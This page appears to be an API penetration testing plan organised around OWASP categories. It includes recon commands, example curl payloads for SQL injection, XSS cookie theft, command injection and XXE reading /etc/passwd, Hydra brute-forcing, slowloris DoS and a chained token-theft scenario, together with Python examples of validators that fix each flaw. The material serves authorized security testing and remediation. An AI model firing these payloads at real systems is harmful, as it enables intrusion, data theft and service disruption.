🔒 OWASP API Security Testing

Comprehensive Penetration Testing Plan for API Security Assessment

1. Introduction

Objective: The purpose of this penetration test is to identify potential security vulnerabilities in the target API, assess the effectiveness of its authentication and authorization mechanisms, and check for common flaws such as SQL Injection, Cross-Site Scripting (XSS), Broken Access Control (BAC), Insecure Direct Object References (IDOR), and Data Exposure.

Scope & Parameters

  • Testing Scope: Only the publicly accessible endpoints of the API are to be tested
  • Internal Testing: Internal endpoints may be tested if appropriate authorization has been provided
  • Duration: Estimated testing period: 3-5 days
  • Test Environment: Live production environment (with permission) or a staging environment

API Penetration Testing Workflow

📋 Planning & Reconnaissance
🔍 Information Gathering
🎯 Vulnerability Assessment
💥 Exploitation
📊 Reporting & Remediation

2. Tools and Resources

The following tools are essential for conducting a comprehensive API penetration test:

  • Burp Suite: for intercepting and manipulating API traffic
  • Postman: for crafting and sending API requests
  • OWASP ZAP: for automated vulnerability scanning
  • Swagger/OpenAPI: for understanding the API structure
  • Python: for scripting custom attacks and automation
  • Nmap: for port scanning and network discovery
  • SQLmap: for automated SQL Injection testing
  • Amass: for subdomain enumeration
  • JWT.io: for inspecting and manipulating JSON Web Tokens

Example: Installing Required Tools

sudo apt-get update && sudo apt-get install burpsuite
pip install requests python-jwt
go install github.com/OWASP/Amass/v3/...@master
git clone https://github.com/sqlmapproject/sqlmap.git

3. Information Gathering and Reconnaissance

3.1 API Documentation Review

Obtain API documentation (Swagger/OpenAPI) to understand the structure of the endpoints and the authentication methods. Review available methods (GET, POST, PUT, DELETE) and expected inputs/outputs.

curl -X GET "https://api.example.com/v1/swagger.json" -H "accept: application/json"

3.2 Enumerate Subdomains and Services

Use tools like Amass or Sublist3r to discover any subdomains hosting API services.

amass enum -d example.com -o subdomains.txt
python3 sublist3r.py -d example.com -o subdomains.txt

3.3 Fingerprinting

Identify the API's backend technologies and frameworks (e.g., Node.js, Flask, Django, etc.).

nmap -sV -p 443 api.example.com
curl -I https://api.example.com/v1/users

3.4 Gather API Endpoints

Use tools like Burp Suite or Postman to map all available API endpoints, noting any potential for authentication or authorization issues.

python3 -m http.server 8080 --directory ./swagger-ui
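
The endpoint map that sections 3.1 and 3.4 ask for can be built directly from the OpenAPI document instead of by hand, and doing so also surfaces operations whose security requirement is missing. The script below is an added example written for this page; it is not a tool from the plan, from OWASP, or from Swagger. The spec it parses is a constructed sample embedded inline, and the review_targets grouping (public operations versus authenticated operations that take an object id in the path) is this example's own convention.

```python
import json

# Constructed sample OpenAPI 3 document standing in for the swagger.json
# fetched in section 3.1; none of these paths belong to a real API.
SAMPLE_SPEC = json.dumps({
    "openapi": "3.0.0",
    "security": [{"bearerAuth": []}],  # document-level default: a token is required
    "paths": {
        "/v1/users/{user_id}/profile": {
            "get": {"summary": "Read a profile"},
            "put": {"summary": "Update a profile", "security": [{"bearerAuth": []}]},
        },
        "/v1/admin/users": {
            "get": {"summary": "List all users", "security": [{"bearerAuth": []}]},
        },
        "/v1/health": {
            "get": {"summary": "Liveness probe", "security": []},  # explicitly public
        },
        "/v1/internal/export": {
            "parameters": [{"name": "format", "in": "query"}],  # not an operation
            "post": {"summary": "Bulk export"},  # inherits the document default
        },
    },
})

HTTP_METHODS = {"get", "post", "put", "patch", "delete", "head", "options", "trace"}


def inventory(spec_text):
    """One record per (method, path) with its effective security requirement.

    OpenAPI resolution rule: an operation-level "security" replaces the
    document-level one, and an empty list means the operation is public.
    If the document has no top-level "security" either, an operation with
    none of its own is public by default, which is exactly the kind of
    omission this inventory is meant to surface.
    """
    spec = json.loads(spec_text)
    document_default = spec.get("security", [])
    records = []
    for path, item in spec.get("paths", {}).items():
        for method, op in item.items():
            if method.lower() not in HTTP_METHODS:
                continue  # "parameters", "summary", "$ref" etc. are not operations
            requirements = op.get("security", document_default)
            records.append({
                "method": method.upper(),
                "path": path,
                "public": len(requirements) == 0,
                "has_path_param": "{" in path,
            })
    return records


def review_targets(records):
    """Split the inventory into the two lists the later phases need:
    public operations (confirm they are meant to be), and authenticated
    operations that take an object id in the path (IDOR candidates for 4.2)."""
    public = sorted(f"{r['method']} {r['path']}" for r in records if r["public"])
    object_refs = sorted(f"{r['method']} {r['path']}"
                         for r in records if r["has_path_param"] and not r["public"])
    return public, object_refs


if __name__ == "__main__":
    recs = inventory(SAMPLE_SPEC)
    public, object_refs = review_targets(recs)
    print(f"{len(recs)} operations; public: {public}; object references: {object_refs}")
```

Run against a real swagger.json by replacing SAMPLE_SPEC with the file contents; any operation that appears in the public list without being a health check or a login route is worth raising with the API owners before the active phases begin.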

3.5 Inspect Authentication

Evaluate how the API handles user authentication, including tokens, cookies, or API keys.

Example: Testing JWT Token

curl -X POST "https://api.example.com/v1/auth/login" -H "Content-Type: application/json" -d '{"username":"testuser","password":"password123"}'
echo "eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9..." | jwt decode -

Phase 1: Passive Reconnaissance
Phase 2: Active Scanning
Phase 3: Endpoint Mapping
Phase 4: Authentication Analysis

4. Testing for Vulnerabilities

4.1 Authentication Testing

Token Authentication: Test for weaknesses in Bearer Tokens or API Key handling.

  • Test expired tokens
  • Attempt to bypass token-based authentication by crafting invalid tokens

Example: Testing Expired Token

curl -X GET "https://api.example.com/v1/users/profile" -H "Authorization: Bearer EXPIRED_TOKEN_HERE"

OAuth2 & JWT Testing:

  • Inspect and manipulate JWT tokens using tools like JWT.io. Check for weak signing algorithms, exposed secrets, and token expiry issues
  • Test for insecure OAuth flows or improper token validation

Example: JWT Token Manipulation

python3 jwt_tool.py eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9... -C -d attack_dictionary.txt
curl -X GET "https://api.example.com/v1/admin" -H "Authorization: Bearer MANIPULATED_TOKEN"
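
The three JWT weaknesses listed above (weak or header-chosen signing algorithm, guessable secret, missing or unenforced expiry) all come down to checks a validator skips. The code below is an added example written for this page, not code from the plan or from jwt_tool; it uses only the Python standard library so it runs offline. DEMO_SECRET, the fixed clock t0 and the claims are constructed values, and make_token's alg parameter exists only so the test matrix can build an unsigned "none" token to feed the validator.

```python
import base64
import hashlib
import hmac
import json
import time

# Constructed demo key; a real service loads its signing key from a secret store.
DEMO_SECRET = b"demo-signing-key-not-for-production"


def _b64url(data):
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode()


def _b64url_decode(text):
    return base64.urlsafe_b64decode(text + "=" * (-len(text) % 4))


def make_token(claims, secret=DEMO_SECRET, alg="HS256"):
    """Mint a token for the test matrix. `alg` is a parameter only so the
    tests can construct an unsigned 'none' token; a real issuer pins HS256."""
    header = _b64url(json.dumps({"alg": alg, "typ": "JWT"}, separators=(",", ":")).encode())
    body = _b64url(json.dumps(claims, separators=(",", ":")).encode())
    if alg == "none":
        return f"{header}.{body}."
    sig = hmac.new(secret, f"{header}.{body}".encode(), hashlib.sha256).digest()
    return f"{header}.{body}.{_b64url(sig)}"


def verify_token(token, secret=DEMO_SECRET, now=None):
    """Validate a token the way a hardened API should, raising ValueError
    with a reason otherwise:
      - the algorithm is pinned server-side (the header's `alg` is not trusted,
        so 'none' and any other downgrade is refused),
      - the signature is compared in constant time,
      - `exp` is mandatory and enforced against the server clock.
    """
    parts = token.split(".")
    if len(parts) != 3:
        raise ValueError("malformed token")
    header_b64, body_b64, sig_b64 = parts
    header = json.loads(_b64url_decode(header_b64))
    if header.get("alg") != "HS256":
        raise ValueError(f"unsupported alg: {header.get('alg')!r}")
    expected = hmac.new(secret, f"{header_b64}.{body_b64}".encode(), hashlib.sha256).digest()
    if not hmac.compare_digest(expected, _b64url_decode(sig_b64)):
        raise ValueError("bad signature")
    claims = json.loads(_b64url_decode(body_b64))
    if "exp" not in claims:
        raise ValueError("missing exp")
    now = time.time() if now is None else now
    if now >= claims["exp"]:
        raise ValueError("token expired")
    return claims


def check(token, **kwargs):
    """(accepted, reason) pair, convenient for tabulating a test matrix."""
    try:
        verify_token(token, **kwargs)
        return True, "ok"
    except ValueError as exc:
        return False, str(exc)


if __name__ == "__main__":
    t0 = 1_700_000_000  # fixed clock so the run is reproducible
    token = make_token({"sub": "testuser", "exp": t0 + 600})
    print("valid now:    ", check(token, now=t0))
    print("after expiry: ", check(token, now=t0 + 601))
    print("alg=none:     ", check(make_token({"sub": "testuser", "exp": t0 + 600}, alg="none"), now=t0))
    print("wrong key:    ", check(make_token({"sub": "testuser", "exp": t0 + 600}, secret=b"guess"), now=t0))
    print("no exp claim: ", check(make_token({"sub": "testuser"}), now=t0))
```

The five rows of the matrix are the cases this section tells the tester to probe; when the target API accepts any of the last four, that is the finding to write up, and the validator above is the shape of the fix.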

Brute Force Testing: Use tools like Hydra or Burp Intruder to test for weak passwords or the absence of rate limiting.

hydra -l admin -P passwords.txt api.example.com https-post-form "/api/v1/login:username=^USER^&password=^PASS^:F=Invalid credentials"

4.2 Authorization and Access Control Testing

Role-based Access Control (RBAC):

  • Test for Broken Access Control (BAC) by manipulating roles (e.g., changing user roles in API requests)
  • Attempt to access endpoints that should only be accessible by specific roles (admin, user)

Example: Testing RBAC Bypass

curl -X GET "https://api.example.com/v1/admin/users" -H "Authorization: Bearer USER_TOKEN"
curl -X POST "https://api.example.com/v1/users/update" -H "Content-Type: application/json" -d '{"user_id":123,"role":"admin"}'

Insecure Direct Object Reference (IDOR):

  • Manipulate URL parameters to test if unauthorized access to user data is possible (e.g., /api/user/123 -> /api/user/124)
  • Attempt to access data from other users (by modifying API request parameters)

Example: Testing IDOR Vulnerability

curl -X GET "https://api.example.com/v1/users/123/profile" -H "Authorization: Bearer USER_TOKEN"
curl -X GET "https://api.example.com/v1/users/124/profile" -H "Authorization: Bearer USER_TOKEN"
for i in {1..1000}; do curl -X GET "https://api.example.com/v1/orders/$i" -H "Authorization: Bearer TOKEN"; done

4.3 Data Validation and Input Sanitization

Vulnerability Type            Testing Method                               Risk Level
SQL Injection                 SQLmap or manual payload injection           Critical
XSS (Cross-Site Scripting)    Submit malicious input in API requests       High
Command Injection             Execute system commands via API parameters   Critical
XXE Injection                 Test XML data processing                     High
File Upload Vulnerabilities   Upload malicious files                       High

Example: SQL Injection Testing

sqlmap -u "https://api.example.com/v1/users?id=1" --cookie="session_id=abc123" --dbs
curl -X GET "https://api.example.com/v1/search?q=' OR '1'='1" -H "Authorization: Bearer TOKEN"
curl -X POST "https://api.example.com/v1/login" -d "username=admin' OR 1=1--&password=anything"

Example: XSS Testing

curl -X POST "https://api.example.com/v1/comments" -H "Content-Type: application/json" -d '{"comment":"<script>alert(document.cookie)</script>"}'
curl -X GET "https://api.example.com/v1/search?q=<img src=x onerror=alert('XSS')>"

Example: Command Injection Testing

curl -X POST "https://api.example.com/v1/ping" -d '{"host":"example.com; cat /etc/passwd"}'
curl -X GET "https://api.example.com/v1/export?filename=file.txt%3Bwhoami"
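
For the SQL Injection and Command Injection rows of the table, the difference between a vulnerable handler and a fixed one is small enough to show side by side. The code below is an added example written for this page, not code from the plan or from any of the listed tools. The users table is a constructed in-memory SQLite database, the /v1/ping handler and its hostname rule are this example's own design, and the payloads it replays are the ones from the curl examples above.

```python
import re
import sqlite3
import subprocess


def demo_db():
    """Constructed in-memory table standing in for the API's users store."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, email TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?, ?)", [
        (1, "alice", "alice@example.com"),
        (2, "bob", "bob@example.com"),
        (3, "carol", "carol@example.com"),
    ])
    return conn


def find_user_vulnerable(conn, username):
    """String concatenation: the client's value becomes part of the SQL text,
    so a quote in it ends the literal and the rest is parsed as SQL."""
    sql = "SELECT username FROM users WHERE username = '" + username + "'"
    return [row[0] for row in conn.execute(sql)]


def find_user_safe(conn, username):
    """Parameter binding: the value travels separately from the statement and
    is only ever compared as data, whatever characters it contains."""
    sql = "SELECT username FROM users WHERE username = ?"
    return [row[0] for row in conn.execute(sql, (username,))]


# RFC 1123 hostname: dot-separated labels of letters, digits and inner hyphens.
_HOSTNAME = re.compile(
    r"^(?=.{1,253}$)[A-Za-z0-9](?:[A-Za-z0-9-]{0,61}[A-Za-z0-9])?"
    r"(?:\.[A-Za-z0-9](?:[A-Za-z0-9-]{0,61}[A-Za-z0-9])?)*$"
)


def is_valid_hostname(host):
    return bool(_HOSTNAME.match(host))


def build_ping_argv(host):
    """argv for the /v1/ping handler. Two controls together: the value must be
    a syntactic hostname (so ';', spaces and a leading '-' are refused), and
    it is passed as one argv element rather than interpolated into a shell
    command line, so nothing ever re-tokenises it."""
    if not is_valid_hostname(host):
        raise ValueError("invalid hostname")
    return ["ping", "-c", "1", host]


def ping_host(host):
    """The hardened handler body: no shell=True, fixed argv, bounded runtime."""
    result = subprocess.run(build_ping_argv(host), capture_output=True, text=True, timeout=5)
    return result.returncode == 0


if __name__ == "__main__":
    conn = demo_db()
    payload = "' OR '1'='1"
    print("concatenated query returns:", find_user_vulnerable(conn, payload))
    print("parameterised query returns:", find_user_safe(conn, payload))
    print("ping argv:", build_ping_argv("example.com"))
```

The vulnerable query returns every row for the quoted payload because the statement the database sees is WHERE username = '' OR '1'='1'; the parameterised version returns nothing because the same characters are compared as a literal username. The hostname check is deliberately stricter than "no semicolons": an allow-list of what a value may be is easier to reason about than a deny-list of shell metacharacters.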

Example: XXE Injection Testing

curl -X POST "https://api.example.com/v1/upload" -H "Content-Type: application/xml" -d '<?xml version="1.0"?><!DOCTYPE foo [<!ENTITY xxe SYSTEM "file:///etc/passwd">]><foo>&xxe;</foo>'

4.4 API Rate Limiting and DoS Testing

⚠️ Warning: DoS testing should only be performed in controlled environments with explicit permission to avoid service disruption.

Rate Limiting Bypass: Test if the API implements proper rate limiting or if attackers can flood the system with requests (e.g., brute-force attempts).

for i in {1..1000}; do curl -X POST "https://api.example.com/v1/login" -d "username=admin&password=test$i" & done

Denial of Service (DoS): Check if the API can be overloaded with a high volume of requests or malformed input.

ab -n 10000 -c 100 https://api.example.com/v1/users
python3 slowloris.py api.example.com -p 443 -s 500

4.5 Business Logic Testing

Misconfiguration or Flaws in Business Logic:

  • Test for flaws in the API logic where an attacker could manipulate the process to their advantage (e.g., changing order status, exploiting discounts)
  • Evaluate if unintended functionality is exposed by API endpoints, which could result in data corruption or misuse

Example: Business Logic Vulnerability Testing

curl -X POST "https://api.example.com/v1/orders" -H "Content-Type: application/json" -d '{"item_id":123,"quantity":-5,"price":100}'
curl -X PUT "https://api.example.com/v1/orders/456/status" -d '{"status":"completed"}' -H "Authorization: Bearer USER_TOKEN"
curl -X POST "https://api.example.com/v1/payments" -d '{"amount":0.01,"order_id":789}'
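
Each of the three requests above probes a different server-side invariant: quantity must be positive, order status may only move along allowed transitions, and a payment must match the order total. The code below is an added example written for this page, not code from the plan; the catalogue, the orders store, the transition table and the roles are all constructed, and the order and item ids are the ones from the curl examples so the three payloads can be replayed against the checks.

```python
from decimal import Decimal

# Constructed catalogue and order store standing in for the shop's database;
# ids 123, 456 and 789 are the ones used in the curl examples above.
CATALOG = {123: Decimal("100.00"), 124: Decimal("19.99")}
ORDERS = {
    456: {"owner": "user-456", "status": "pending", "total": Decimal("100.00")},
    789: {"owner": "user-789", "status": "pending", "total": Decimal("199.98")},
}

# The only legal status transitions, and which role may trigger each one.
TRANSITIONS = {
    ("pending", "paid"): {"payment-service"},
    ("pending", "cancelled"): {"customer"},
    ("paid", "shipped"): {"warehouse"},
    ("shipped", "completed"): {"warehouse", "customer"},
}


def create_order(item_id, quantity, client_price=None):
    """Quantity must be a positive integer, and the price is looked up
    server-side: `client_price` is accepted only so the request shape matches
    the curl example, and is deliberately ignored."""
    if isinstance(quantity, bool) or not isinstance(quantity, int) or quantity <= 0:
        raise ValueError("quantity must be a positive integer")
    if item_id not in CATALOG:
        raise ValueError("unknown item")
    return {"item_id": item_id, "quantity": quantity, "total": CATALOG[item_id] * quantity}


def update_status(order_id, new_status, actor_role, actor_id):
    """Enforce both the state machine and ownership."""
    order = ORDERS[order_id]
    if actor_role == "customer" and order["owner"] != actor_id:
        raise PermissionError("not the order owner")
    if actor_role not in TRANSITIONS.get((order["status"], new_status), set()):
        raise PermissionError(f"{actor_role} may not move {order['status']} -> {new_status}")
    order["status"] = new_status
    return order["status"]


def record_payment(order_id, amount):
    """The paid amount must equal the server-side total exactly; a partial
    payment never advances the order."""
    order = ORDERS[order_id]
    if Decimal(str(amount)) != order["total"]:
        raise ValueError("amount does not match order total")
    return update_status(order_id, "paid", "payment-service", "payment-service")


def replay_page_examples():
    """Push the three request bodies from the curl examples above through the
    checks and collect the outcome of each."""
    cases = [
        ("negative quantity", lambda: create_order(123, -5, client_price=100)),
        ("customer marks pending order completed",
         lambda: update_status(456, "completed", "customer", "user-456")),
        ("one-cent payment", lambda: record_payment(789, 0.01)),
    ]
    results = {}
    for name, action in cases:
        try:
            action()
            results[name] = "accepted"
        except (ValueError, PermissionError) as exc:
            results[name] = f"rejected: {exc}"
    return results


if __name__ == "__main__":
    for name, outcome in replay_page_examples().items():
        print(f"{name}: {outcome}")
```

The price check is the one most often missing in practice: the client sends a price field, so the server stores it. Ignoring client-supplied totals and recomputing from the catalogue removes that whole class of finding, and Decimal rather than float keeps the comparison in record_payment exact.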

5. Exploitation

5.1 Payload Testing

Test real-world scenarios using custom payloads (injection, XSS, command execution) to exploit identified vulnerabilities.

Example: Custom Exploitation Script

python3 custom_exploit.py --target https://api.example.com --vulnerability sqli --payload "' OR 1=1--"
curl -X POST "https://api.example.com/v1/vulnerable" -d @exploit_payload.json

5.2 Chaining Vulnerabilities

Explore how multiple vulnerabilities might be chained together to escalate privileges, cause data leaks, or compromise the system.

Example: Chained Attack Scenario

Step 1: Exploit IDOR to access another user's data

curl -X GET "https://api.example.com/v1/users/999/token" -H "Authorization: Bearer USER_TOKEN"

Step 2: Use stolen token to access admin endpoint

curl -X GET "https://api.example.com/v1/admin/settings" -H "Authorization: Bearer STOLEN_ADMIN_TOKEN"

Step 3: Modify system configuration

curl -X PUT "https://api.example.com/v1/admin/config" -H "Authorization: Bearer STOLEN_ADMIN_TOKEN" -d '{"debug_mode":"true"}'

Attack Chain Visualization

🎯 Initial Access (IDOR)
🔓 Token Theft
👑 Privilege Escalation
💀 System Compromise

6. Reporting

6.1 Vulnerability Documentation

For each vulnerability found, document the following:

  • Description of the vulnerability
  • Proof of concept (PoC) demonstrating the issue
  • Risk assessment (severity level)
  • Steps to reproduce
  • Recommendations for remediation

Example: Vulnerability Report Template

Vulnerability: Insecure Direct Object Reference (IDOR)

Severity: High

Affected Endpoint: GET /api/v1/users/{user_id}/profile

Description: The API does not properly validate user authorization when accessing user profiles, allowing any authenticated user to access other users' sensitive information by manipulating the user_id parameter.

Proof of Concept:

curl -X GET "https://api.example.com/v1/users/123/profile" -H "Authorization: Bearer USER_TOKEN_FOR_USER_456"

Impact: Unauthorized access to sensitive user data including email addresses, phone numbers, and personal information.

Remediation: Implement proper authorization checks to ensure users can only access their own profile data. Validate that the authenticated user's ID matches the requested user_id parameter.
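
The authorization check this remediation calls for, and the role check behind the RBAC test in 4.2, are shown below as a vulnerable handler next to its fixed form. This is an added example written for this page, not code from the plan or from any framework; the session and profile stores are constructed, the bearer token strings are the placeholders used in the examples above, and the choice to answer a failed ownership check with 404 rather than 403 is this example's own design decision.

```python
# Constructed session and profile stores standing in for the API's backend;
# the bearer token strings are the placeholders used in the examples above.
SESSIONS = {
    "USER_TOKEN_FOR_USER_456": {"user_id": 456, "role": "user"},
    "USER_TOKEN_FOR_USER_123": {"user_id": 123, "role": "user"},
    "ADMIN_TOKEN": {"user_id": 1, "role": "admin"},
}
PROFILES = {
    123: {"email": "u123@example.com", "phone": "+1-555-0100", "role": "user"},
    456: {"email": "u456@example.com", "phone": "+1-555-0199", "role": "user"},
}
NOT_FOUND = (404, {"error": "not found"})
UNAUTHENTICATED = (401, {"error": "unauthenticated"})


def authenticate(headers):
    """Resolve the bearer token to a session, or None."""
    value = headers.get("Authorization", "")
    if not value.startswith("Bearer "):
        return None
    return SESSIONS.get(value[len("Bearer "):])


def get_profile_vulnerable(headers, user_id):
    """Authenticates and then trusts the path parameter: the IDOR in the report."""
    if authenticate(headers) is None:
        return UNAUTHENTICATED
    profile = PROFILES.get(user_id)
    return (200, profile) if profile else NOT_FOUND


def get_profile_secure(headers, user_id):
    """The remediation: the caller must own the requested profile or hold the
    admin role. A failed ownership check returns 404 rather than 403 so the
    endpoint does not confirm which user_ids exist."""
    session = authenticate(headers)
    if session is None:
        return UNAUTHENTICATED
    if session["user_id"] != user_id and session["role"] != "admin":
        return NOT_FOUND
    profile = PROFILES.get(user_id)
    return (200, profile) if profile else NOT_FOUND


def set_role_secure(headers, target_user_id, new_role):
    """RBAC for the role-change request in 4.2: an unauthenticated call is
    refused outright, only an admin session may change a role, and the role
    value must come from a fixed set."""
    session = authenticate(headers)
    if session is None:
        return UNAUTHENTICATED
    if session["role"] != "admin":
        return 403, {"error": "forbidden"}
    if new_role not in {"user", "admin"}:
        return 400, {"error": "bad request"}
    if target_user_id not in PROFILES:
        return NOT_FOUND
    PROFILES[target_user_id]["role"] = new_role
    return 200, {"user_id": target_user_id, "role": new_role}


if __name__ == "__main__":
    as_456 = {"Authorization": "Bearer USER_TOKEN_FOR_USER_456"}
    print("vulnerable, user 456 reads 123:", get_profile_vulnerable(as_456, 123)[0])
    print("fixed, user 456 reads 123:     ", get_profile_secure(as_456, 123)[0])
    print("fixed, user 456 reads 456:     ", get_profile_secure(as_456, 456)[0])
```

The vulnerable handler is the one the proof of concept above succeeds against: it checks who the caller is, but never whether that caller is allowed the object named in the path. Both fixed handlers keep the decision in one place next to the data access rather than in the router, which is where it is most often forgotten when a new endpoint is added.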

6.2 Test Results Summary

Provide an executive summary of the overall security posture, with details of critical findings and a roadmap for remediation.

Severity   Count   Example Vulnerabilities
Critical   3       SQL Injection, Remote Code Execution, Authentication Bypass
High       5       IDOR, Broken Access Control, XSS
Medium     8       Information Disclosure, Missing Rate Limiting
Low        12      Missing Security Headers, Verbose Error Messages

6.3 Verification

Once the vulnerabilities have been patched, perform a re-test to ensure that the issues are properly resolved.

python3 verify_fixes.py --report vulnerabilities_report.json --target https://api.example.com
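
A re-test is only repeatable if each finding records the request that reproduced it and the response a fix should now produce. The code below is an added example of such a harness written for this page; it is not the verify_fixes.py script named above, whose contents the plan does not show. The findings export is a constructed sample in the shape of the 6.1 template, the expected_status_after_fix field is this example's own convention, and the send callable is injectable so the logic can run against a fake transport offline.

```python
import json
import urllib.error
import urllib.request

# Constructed findings export in the shape of the 6.1 report template; the
# endpoints and tokens are the placeholders used earlier in this plan.
FINDINGS_JSON = json.dumps([
    {
        "id": "F-1", "title": "IDOR on user profile",
        "method": "GET", "path": "/v1/users/123/profile",
        "headers": {"Authorization": "Bearer USER_TOKEN_FOR_USER_456"},
        "expected_status_after_fix": [403, 404],
    },
    {
        "id": "F-2", "title": "Role change without authentication",
        "method": "POST", "path": "/v1/users/update",
        "headers": {}, "body": {"user_id": 123, "role": "admin"},
        "expected_status_after_fix": [401],
    },
])


def http_send(method, path, headers, body, base_url="https://api.example.com"):
    """Real transport: returns the HTTP status code, including for 4xx/5xx."""
    data = json.dumps(body).encode() if body is not None else None
    request = urllib.request.Request(base_url + path, data=data, method=method, headers=dict(headers))
    if data is not None:
        request.add_header("Content-Type", "application/json")
    try:
        with urllib.request.urlopen(request, timeout=10) as response:
            return response.status
    except urllib.error.HTTPError as exc:
        return exc.code


def verify_fixes(findings_json, send=http_send):
    """Replay each finding's proof of concept and record whether the response
    is now one of the statuses the remediation should produce."""
    results = []
    for finding in json.loads(findings_json):
        status = send(finding["method"], finding["path"],
                      finding.get("headers", {}), finding.get("body"))
        results.append({
            "id": finding["id"],
            "observed": status,
            "fixed": status in finding["expected_status_after_fix"],
        })
    return results


def unresolved(results):
    """Finding ids that still reproduce and go back to the remediation queue."""
    return [r["id"] for r in results if not r["fixed"]]


if __name__ == "__main__":
    # Offline demonstration with a fake transport: the profile endpoint now
    # answers 404, the role-change endpoint still answers 200.
    fake = lambda method, path, headers, body: 404 if method == "GET" else 200
    outcome = verify_fixes(FINDINGS_JSON, send=fake)
    print("still reproducing:", unresolved(outcome))
```

Recording the expected post-fix status alongside the proof of concept at reporting time, rather than at re-test time, keeps the re-test objective: the tester and the client agreed on what "fixed" looks like before anyone changed code.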

7. Conclusion

Wrap-up

Summarize findings, provide a risk-level assessment of each vulnerability, and deliver actionable remediation steps.

Client Debrief

Offer a meeting to go over the findings and explain the potential impact of the vulnerabilities.

📌 Key Takeaways

  • This API Penetration Testing Plan provides a structured methodology for identifying and exploiting vulnerabilities in web APIs
  • The goal is to ensure the security of the application's API endpoints by testing various attack vectors, ranging from authentication flaws to business logic vulnerabilities
  • Ensure proper reporting, remediation, and follow-up testing for a complete and responsible security assessment
  • Always obtain explicit written permission before conducting any penetration testing activities
  • Document all findings thoroughly and provide clear remediation guidance
  • Follow responsible disclosure practices when reporting vulnerabilities

Continuous Security Improvement Cycle

Test → Report → Remediate → Verify → (repeat)